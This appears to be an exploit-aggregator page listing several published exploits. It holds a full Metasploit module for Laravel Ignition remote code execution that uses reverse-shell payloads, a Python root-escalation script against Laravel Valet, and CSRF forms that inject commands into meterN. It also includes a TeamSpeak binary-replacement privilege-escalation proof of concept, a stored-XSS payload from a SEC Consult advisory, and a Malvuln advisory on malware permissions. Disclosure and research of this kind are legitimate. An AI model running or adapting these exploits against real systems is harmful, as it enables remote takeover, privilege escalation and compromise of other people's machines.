Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/8c9e7906d0ad5d0f2267be0057f2a8e3.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Mechbot.a Vulnerability: Insecure Permissions Description: The malware creates a dir with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: 8c9e7906d0ad5d0f2267be0057f2a8e3 Vuln ID: MVID-2021-0417 Disclosure: 12/11/2021 Exploit/PoC: C:\>cacls "TitanZone BOT" C:\TitanZone BOT BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C C:\>dir "TitanZone BOT" Volume in drive C has no label. Directory of C:\TitanZone BOT 06/15/2003 11:24 AM 591 checkmech 06/15/2003 11:24 AM 21,854 configure 11/19/2021 12:13 AM DIR CONTRIB 05/10/2003 02:07 PM 201,216 CYGWIN1.DLL 05/10/2003 02:07 PM 4,305 GENUSER 07/02/2003 08:44 PM 35 LinkEvents 06/15/2003 11:24 AM 1,391 Makefile 05/10/2003 02:07 PM 22,882 mech.help 07/02/2003 08:40 PM 6 MECH.PID 07/02/2003 08:45 PM 2,464 MECH.SET 05/10/2003 02:07 PM 796 MKINDEX 11/19/2021 12:13 AM DIR randfiles 11/19/2021 12:13 AM DIR SRC 06/26/2003 09:09 PM 213 titanzone.bat 11/19/2021 12:13 AM DIR TOOLS 05/10/2003 02:07 PM 192,512 WinMech.exe 07/02/2003 08:45 PM 155 winmech.users Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions # Date: 2022-02-15 # Exploit Author: Aryan Chehreghani # Contact: aryanchehreghani@yahoo.com # Vendor Homepage: https://www.teamspeak.com # Software Link: https://www.teamspeak.com/en/downloads # Version: 3.5.6 # Tested on: Windows 10 x64 # [ About - TeamSpeak ]: #TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP), #application for audio communication between users on a chat channel, #much like a telephone conference call, Users typically use headphones with a microphone, #The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels, #The target audience for TeamSpeak is gamers, who can use the software to communicate, #with other players on the same team of a multiplayer video game, #Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls. # [ Description ]: #The TeamSpeak Application was installed with insecure file permissions. #It was found that all folder and file permissions were incorrectly configured during installation. #It was possible to replace the service binary. # [ POC ]: C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe createfileassoc.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) error_report.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) package_inst.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) ts3client_win32.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) Uninstall.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) update.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) Successfully processed 7 files; Failed processing 0 files # [ Exploit - Privilege Escalation ]: #Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ... #with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211213-1 > ======================================================================= title: Stored Cross Site Scripting product: Sofico Miles RIA vulnerable version: 2020.2 build 127964T fixed version: 2020.2 build 128076 or higher CVE number: CVE-2021-41557 impact: Medium homepage: https://www.sofico.global found: 2021-07-09 by: Oualid Lkhaouni (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Sofico is the world’s leading supplier of mission-critical software solutions for automotive finance, leasing, fleet, and mobility management companies, and its software is used by a broad range of renowned leasing companies all over the world." Source: https://www.sofico.global/en/about-sofico Business recommendation: ------------------------ SEC Consult recommends updating to the latest version of Sofico Miles RIA. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- 1) Stored Cross Site Scripting (CVE-2021-41557) Miles RIA is a software solution by Sofico that allows leasing companies to manage their leasing services on a single platform. The Miles RIA application is vulnerable to Stored Cross-Site Scripting (XSS). An attacker with access to a user account of the RIA IT or the Fleet role can create a malicious work order in the damage reports section or change existing work orders with malicious JavaScript. Proof of concept: ----------------- 1) Stored Cross Site Scripting (CVE-2021-41557) The following payload can be used for the insecure work order number parameter of pending work orders in the damage reports section to inject and execute malicious JavaScript in the context of the victim. Once the victim visits the malicious work order, the attacker-controlled input gets reflected in the lower left context menu of the loaded webpage: 1000 <img src=x onerror=alert(document.domain)> This JavaScript code will then automatically get executed when the site which contains the payload is visited by the victim. Vulnerable / tested versions: ----------------------------- The following software version has been tested and found to be vulnerable: * Miles RIA 2020.2 build 127964T It is unknown whether previous versions are affected, as the vendor did not supply this information. Vendor contact timeline: ------------------------ 2021-07-26: Contacting vendor through contact.de@sofico.global; No answer. 2021-08-24: Contacting vendor through contact.de@sofico.global; No answer. 2021-09-21: Contacting vendor through contact.de@sofico.global and contact@sofico.global; No answer. 2021-11-04: Informing vendor about public advisory release on 9th November 2021. 2021-11-08: Received info from 3rd party about patches. 2021-11-24: Informing vendor about public advisory release on 29th November 2021. 2021-11-24: Received more detailed info from 3rd party about patches. 2021-12-01: Coordination call with vendor. 2021-12-13: Coordinated release of security advisory. Solution: --------- The vendor provides patches for the affected product versions: * Miles RIA 2020.2 build 128076 or higher Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Oualid Lkhaouni / @2021 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Unauthenticated remote code execution in Ignition', 'Description' => %q{ Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. }, 'Author' => [ 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging 'ambionics' # discovered ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-3129'], ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce'] ], 'DisclosureDate' => '2021-01-13', 'Platform' => %w[unix linux macos win], 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Windows (In-Memory)', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :win_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } } ] ], 'Privileged' => false, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']), OptString.new('LOGFILE', [false, 'Laravel log file absolute path']) ]) end def check print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'method' => 'PUT' }, 1) # Check whether it is using facade/ignition # If is using it should respond method not allowed # checking if debug mode is enable if res && res.code == 405 && res.body.match(/label:"(Debug)"/) vprint_status 'Debug mode is enabled.' # check version versions = JSON.parse( res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}') ) version = Rex::Version.new(versions['framework_version']) vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}" # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid) # but it is way more intrusive than just checking the version moreover we would need to call # the find_log_file method before, meaning four requests more. return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1') end return Exploit::CheckCode::Safe end def exploit @logfile = datastore['LOGFILE'] || find_log_file fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile clear_log put_payload convert_to_phar run_phar handler clear_log end def find_log_file vprint_status 'Trying to detect log file' res = post Rex::Text.rand_text_alpha_upper(12) if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?}) logpath = Regexp.last_match(1).gsub(/\\/, '') vprint_status "Found directory candidate #{logpath}" logfile = "#{logpath}/storage/logs/laravel.log" vprint_status "Checking if #{logfile} exists" res = post logfile if res.code == 200 vprint_status "Found log file #{logfile}" return logfile end vprint_error "Log file does not exist #{logfile}" return end vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually' return end def clear_log res = post "php://filter/read=consumed/resource=#{@logfile}" # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true) fail_with(Failure::UnexpectedReply, "Log file #{@logfile} doesn't seem to exist.") unless res.code == 200 end def put_payload post format_payload post Rex::Text.rand_text_alpha_upper(2) end def convert_to_phar filters = %w[ convert.quoted-printable-decode convert.iconv.utf-16le.utf-8 convert.base64-decode ].join('|') post "php://filter/write=#{filters}/resource=#{@logfile}" end def run_phar post "phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt" # resp.body.match(%r{^(.*)\n<!doctype html>}) # $1 ? print_good($1) : nil end def body_template(data) { solution: 'Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution', parameters: { viewFile: data, variableName: Rex::Text.rand_text_alpha_lower(4..12) } }.to_json end def post(data) send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'method' => 'POST', 'data' => body_template(data), 'ctype' => 'application/json', 'headers' => { 'Accept' => '*/*', 'Accept-Encoding' => 'gzip, deflate' } }) end def generate_phar(pop) file = Rex::Text.rand_text_alpha_lower(8) stub = "<?php __HALT_COMPILER(); ?>\r\n" file_contents = Rex::Text.rand_text_alpha_lower(20) file_crc32 = Zlib.crc32(file_contents) & 0xffffffff manifest_len = 40 + pop.length + file.length phar = stub phar << [manifest_len].pack('V') # length of manifest in bytes phar << [0x1].pack('V') # number of files in the phar phar << [0x11].pack('v') # api version of the phar manifest phar << [0x10000].pack('V') # global phar bitmapped flags phar << [0x0].pack('V') # length of phar alias phar << [pop.length].pack('V') # length of phar metadata phar << pop # pop chain phar << [file.length].pack('V') # length of filename in the archive phar << file # filename phar << [file_contents.length].pack('V') # length of the uncompressed file contents phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970. phar << [file_contents.length].pack('V') # length of the compressed file contents phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents phar << [0x1b6].pack('V') # bit-mapped file-specific flags phar << [0x0].pack('V') # serialized File Meta-data length phar << file_contents # serialized File Meta-data phar << [Rex::Text.sha1(phar)].pack('H*') # signature phar << [0x2].pack('V') # signiture type phar << 'GBMB' # signature presence return phar end def format_payload # rubocop:disable Style/StringLiterals serialize = "a:2:{i:7;O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\"" serialize << ":1:{S:41:\"\\00GuzzleHttp\\5cCookie\\5cFileCookieJar\\00filename\";" serialize << "O:38:\"Illuminate\\Validation\\Rules\\RequiredIf\"" serialize << ":1:{S:9:\"condition\";a:2:{i:0;O:20:\"PhpOption\\LazyOption\"" serialize << ":2:{S:30:\"\\00PhpOption\\5cLazyOption\\00callback\";" serialize << "S:6:\"system\";S:31:\"\\00PhpOption\\5cLazyOption\\00arguments\";" serialize << "a:1:{i:0;S:#{payload.encoded.length}:\"#{payload.encoded}\";}}i:1;S:3:\"get\";}}}i:7;i:7;}" # rubocop:enable Style/StringLiterals phar = generate_phar(serialize) b64_gadget = Base64.strict_encode64(phar).gsub('=', '') payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00' end end </code></pre>

<pre><code># Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS) # Exploit Author: leonjza # Vendor Homepage: https://laravel.com/docs/8.x/valet # Version: v1.1.4 to v2.0.3 #!/usr/bin/env python2 # Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS) # February 2017 - @leonjza # Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes. # Reintroduced in v2.0.7 via the 'trust' command again. # This bug got introduced when the sudoers files got added around # commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1]. # Effectively, when the valet command is installed, composer will symlink [2] # the `valet` command to /usr/local/bin. This 'command' is writable by the user # that installed it. # # ~ $ ls -lah $(which valet) # lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet # Running `valet install`, will start the install [3] routine. The very first action # taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which # will prompt the user for the sudo password in the command line. From here (and in fact # from any point where the valet tool uses sudo) the command can execute further commands # as root without any further interaction needed by the user. # With this 'sudo' access, the installer does it thing, and eventually installs two new # sudoers rules for homebrew[5] and valet[6]. # ~ $ cat /etc/sudoers.d/* # Cmnd_Alias BREW = /usr/local/bin/brew * # %admin ALL=(root) NOPASSWD: BREW # Cmnd_Alias VALET = /usr/local/bin/valet * # %admin ALL=(root) NOPASSWD: VALET # The problem with the sudoers rules now is the fact that a user controlled script # (rememeber the valet command is writable to my user?) is allowed to be run with # root privileges. More conveniently, without a password. So, to trivially privesc # using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D # Or, use this lame script you lazy sod. # # ~ $ sudo -k # ~ $ python escalate.py # * Shell written. Dropping into root shell # bash-3.2# whoami # root # bash-3.2# exit # exit # * Cleaning up POC from valet command # [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40 # [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39 # [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50 # [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133 # [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177 # [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46 import os import subprocess MIN_VERSION = "1.1.4" MAX_VERSION = "2.0.3" POC = "/bin/bash; exit;\n" def run_shit_get_output(shit_to_run): return subprocess.Popen(shit_to_run, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) def version_tuple(v): return tuple(map(int, (v.split(".")))) def get_valet(): p = run_shit_get_output('which valet') lines = ''.join(p.stdout.readlines()) if 'bin/valet' in lines: return lines.strip() return None def get_valet_version(valet_location): p = run_shit_get_output(valet_location) v = p.stdout.read(25) return v.split("\n")[0].split(" ")[2] def can_write_to_valet(valet_location): return os.access(valet_location, os.W_OK) def cleanup_poc_from_command(command_location): with open(command_location, 'r') as vc: command_contents = vc.readlines() if command_contents[1] == POC: print('* Cleaning up POC from valet command') command_contents.pop(1) with open(command_location, 'w') as vc: vc.write(''.join(command_contents)) return print('* Could not cleanup the valet command. Check it out manually!') return def main(): valet_command = get_valet() if not valet_command: print(' * The valet command could not be found. Bailing!') return # get the content so we can check if we already pwnd it with open(valet_command, 'r') as vc: command_contents = vc.readlines() # check that we havent already popped this thing if command_contents[1] == POC: print('* Looks like you already pwnd this. Dropping into shell anyways.') os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) return current_version = get_valet_version(valet_command) # ensure we have a valid, exploitable version if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \ or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)): print(' * Valet version {0} does not have this bug!'.format(current_version)) return # check that we can write if not can_write_to_valet(valet_command): print('* Cant write to valet command at {0}. Bailing!'.format(valet_command)) return # drop the poc line and write the new one command_contents.insert(1, POC) with open(valet_command, 'w') as vc: vc.write(''.join(command_contents)) print('* Shell written. Dropping into root shell') # drop in the root shell :D os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) if __name__ == '__main__': main() </code></pre>

<pre><code> PoC #1: ------- <html> <body> <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST"> <input type="hidden" name="NUMINDx" value="1" /> <input type="hidden" name="INDNAMEx1" value="test" /> <input type="hidden" name="IDx1" value="1" /> <input type="hidden" name="COMMANDx1" value="calc" /> <input type="hidden" name="bntsubmit1" value="Test command" /> <input type="hidden" name="UNITx1" value="" /> <input type="submit" value="Incongruity" /> </form> </body> </html> PoC #2: ------- <html> <body> <form action="http://localhost/metern/admin/admin_meter2.php" method="POST"> <input type="hidden" name="METNAMEx" value="Conso" /> <input type="hidden" name="COLORx" value="962629" /> <input type="hidden" name="TYPEx" value="Elect" /> <input type="hidden" name="PRODx" value="2" /> <input type="hidden" name="PHASEx" value="1" /> <input type="hidden" name="SKIPMONITORINGx" value="" /> <input type="hidden" name="IDx" value="elect" /> <input type="hidden" name="COMMANDx" value="houseenergy -energy" /> <input type="hidden" name="PASSOx" value="100000" /> <input type="hidden" name="PRICEx" value="0.23" /> <input type="hidden" name="LIDx" value="elect" /> <input type="hidden" name="LIVECOMMANDx" value="calc" /> <input type="hidden" name="bntsubmit" value="Test live command" /> <input type="hidden" name="EMAILx" value="" /> <input type="hidden" name="WARNCONSODx" value="15000" /> <input type="hidden" name="NORESPMx" value="true" /> <input type="hidden" name="POAKEYx" value="" /> <input type="hidden" name="POUKEYx" value="" /> <input type="hidden" name="TLGRTOKx" value="" /> <input type="hidden" name="TLGRCIDx" value="" /> <input type="hidden" name="met_numx" value="1" /> <input type="submit" value="Incongruity" /> </form> </body> </html> </code></pre>